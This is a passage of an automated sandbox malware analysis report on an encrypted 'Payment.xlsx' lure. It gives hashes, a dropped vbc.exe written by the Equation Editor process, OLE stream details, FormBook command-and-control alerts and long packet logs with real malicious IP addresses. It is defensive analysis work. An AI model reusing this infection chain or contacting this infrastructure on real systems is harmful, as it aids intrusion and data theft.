                                                                                                                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                              C:\Users\user\Desktop\~$Payment.xlsx
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):330
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\Public\vbc.exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):665600
                                                                                                                                                              Entropy (8bit):7.6258646097638785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                                                                                                              MD5:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              SHA1:ACBCECF7599D3C33F6F2A36C0947CFC633D0A406
                                                                                                                                                              SHA-256:9E189D8D48A66D2F53C972275642DA7CBC8AD51B20F04CF1D592BEF360DB50CF
                                                                                                                                                              SHA-512:35E43A0F2EF1DD2DFAF921D8AF3A4F3EF0F4675479D496141358561C84A3B8C8B1A5BD9497FE6C26757D3E6637EDAB538AC587D73BC6D47E9B90B751ABF55BA3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V..`..............P.............&=... ...@....@.. ....................................@..................................<..O....@.......................`....................................................... ............... ..H............text...,.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......,n...m...............`...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....o....(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:CDFV2 Encrypted
                                                                                                                                                              Entropy (8bit):7.98035578403973
                                                                                                                                                              TrID:
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                              File name:Payment.xlsx
                                                                                                                                                              File size:1363456
                                                                                                                                                              MD5:05f49aa5b342dedd1d7b6673f3d8bc41
                                                                                                                                                              SHA1:9ca061b9851269f8b1d2fd990ebe119903a5f0fb
                                                                                                                                                              SHA256:3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
                                                                                                                                                              SHA512:dc296422a45c34721b0746b1b3b34581def5b69b081718e790d4ad75e9e67c6f1afd6a5197ee48fba9d1d7c574ac95a4797b29ad4b2bfc094580fffa78513f2b
                                                                                                                                                              SSDEEP:24576:iiOiNObhnSFbuLWFBMNbjlq2W6g4t0RH/UXOal6UKcv1eytV:LOi4hobc1P7/CC6LiUqV
                                                                                                                                                              File Content Preview:........................>...................3....................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2..

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OLE
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "Payment.xlsx"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:False
                                                                                                                                                              Application Name:unknown
                                                                                                                                                              Encrypted Document:True
                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:False

                                                                                                                                                              Streams

                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:64
                                                                                                                                                              Entropy:2.73637206947
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:112
                                                                                                                                                              Entropy:2.7597816111
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:200
                                                                                                                                                              Entropy:3.13335930328
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/Version
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:76
                                                                                                                                                              Entropy:2.79079600998
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 1333560
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptedPackage
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:1333560
                                                                                                                                                              Entropy:7.99982132167
                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                              Data ASCII:/ Y . . . . . . . . ~ ? . . ] M . . . . . T . . . * m X . . . . . . . . . . t . . . b H v . . . 9 . S . $ / 2 9 . ' X . . . b . 6 . / x . \\ < . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . .
                                                                                                                                                              Data Raw:2f 59 14 00 00 00 00 00 2e 08 7e 3f 18 e8 5d 4d 17 0f ff b5 a7 54 ec 89 fb 2a 6d 58 b5 b6 cd e3 b5 b9 9a 05 d2 a9 74 8b c1 a9 62 48 76 ba a0 d2 39 f3 53 e9 24 2f 32 39 92 27 58 cd 20 a2 e3 62 e8 36 b3 2f 78 18 5c 3c d8 92 c1 44 1f 58 11 ef 8c a1 46 82 7d 77 fa 77 d8 92 c1 44 1f 58 11 ef 8c a1 46 82 7d 77 fa 77 d8 92 c1 44 1f 58 11 ef 8c a1 46 82 7d 77 fa 77 d8 92 c1 44 1f 58 11 ef
                                                                                                                                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptionInfo
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:224
                                                                                                                                                              Entropy:4.45948973456
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . M . . U s T . . . l . e . . W . W . . . . . . . b 7 . . . . . . . . . C . . + + % a A . . . . . . . . . . . n ( . h . . . . . H . A
                                                                                                                                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                              Network Behavior

                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                              05/04/21-16:58:51.294439TCP3132WEB-CLIENT PNG large image width download attempt8049167192.3.122.177192.168.2.22
                                                                                                                                                              05/04/21-17:00:20.875209TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2266.235.200.147
                                                                                                                                                              05/04/21-17:00:20.875209TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2266.235.200.147
                                                                                                                                                              05/04/21-17:00:20.875209TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2266.235.200.147

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              May 4, 2021 16:58:50.332815886 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.469008923 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.469146967 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.469680071 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.608273983 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608302116 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608313084 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608345032 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608370066 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.608395100 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.608397007 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.743635893 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743664980 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743678093 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743690968 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743702888 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743719101 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743731022 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743743896 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743747950 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.743788004 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.743797064 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880028963 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880065918 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880089998 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880114079 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880125999 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880136967 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880152941 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880156994 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880163908 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880170107 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880189896 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880198002 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880213022 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880224943 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880237103 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880238056 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880261898 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880275011 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880285025 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880289078 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880307913 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880319118 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880331993 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880335093 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880358934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880363941 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880383968 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880392075 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880407095 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880415916 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880439043 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.882770061 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018105984 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018131971 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018153906 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018171072 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018177986 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018198967 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018199921 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018203020 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018212080 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018220901 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018243074 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018244982 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018264055 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018273115 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018289089 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018289089 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018296957 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018311024 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018335104 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018341064 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018567085 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018591881 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018613100 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018627882 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018647909 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018652916 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018668890 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018688917 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018692017 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018712997 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018716097 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018738031 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018738985 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018748045 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018762112 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018773079 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018784046 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018799067 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018806934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018826962 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018832922 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018846035 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018856049 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018867016 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018877983 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018884897 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018889904 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018893003 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018914938 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018924952 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018935919 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018949032 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018956900 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018975973 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018994093 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018997908 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.019007921 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.019018888 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.019037008 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.019267082 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.021294117 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153573036 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153608084 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153635025 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153661966 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153683901 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153723001 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153748035 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153772116 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153783083 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153795958 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153819084 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153836966 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153860092 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153871059 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153887987 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153919935 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153928995 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153944016 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153949976 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153968096 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.153979063 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.153994083 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154016018 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154027939 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154041052 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154045105 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154063940 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154067039 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154089928 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154102087 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154129028 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154355049 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154381037 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154405117 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154416084 CEST4916780192.168.2.22192.3.122.177
